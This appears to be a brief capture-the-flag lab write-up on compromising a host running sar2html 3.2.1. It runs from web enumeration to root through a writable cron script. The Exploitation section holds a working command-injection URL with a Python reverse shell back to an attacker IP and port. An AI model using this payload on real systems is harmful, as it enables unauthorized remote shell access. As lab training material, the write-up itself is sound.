>[!info] Open Ports > 22 (ssh) ver. 7.6p1 > 80 (http) ver. Apache httpd 2.4.29 # Initial Web Exploration Port 80 means http server... `feroxbuster --url "http://192.168.154.35/" --wordlist /usr/share/seclists/Discovery/Web-Content/common.txt --threads 100` While ferox is running, we can browse the website. However the website at its face is just the default Apache "hey this works" page. When ferox buster finishes, it shows... ![[Ferox.out.png]] The last 2 seem interesting! robots.txt is a file that tells search engine crawlers what pages they can go to and index. ![[robots.png]] When we browse to this page note, the version number (3.2.1) as well as click around we see a potentially exploitable parameter in the url: ![[sar2html.png]] After some research ver 3.2.1 is exploitable (exploit.db 47204) # Exploitation I used a python3 reverse shell in the URL: `192.168.154.35/sar2HTML/index.php?plot=;python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("192.168.45.162",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'` We get popped into a shell as www-data! From here I started downloading some of the files in the current directory as the one above as they seemed interesting. While I read it I ran linpeas.sh to find me some potential privilege escalation vectors. ![[scripts.png]] In the meantime linpeas found a cronjob running that runs the finally.sh script which is editable by www-data. I then created a simple script with a reverse shell in it, renamed it to write.sh, uploaded it to the victim and made it executable. Fast forward a couple minutes and a root shell pops! The machine as well as the flags are ours!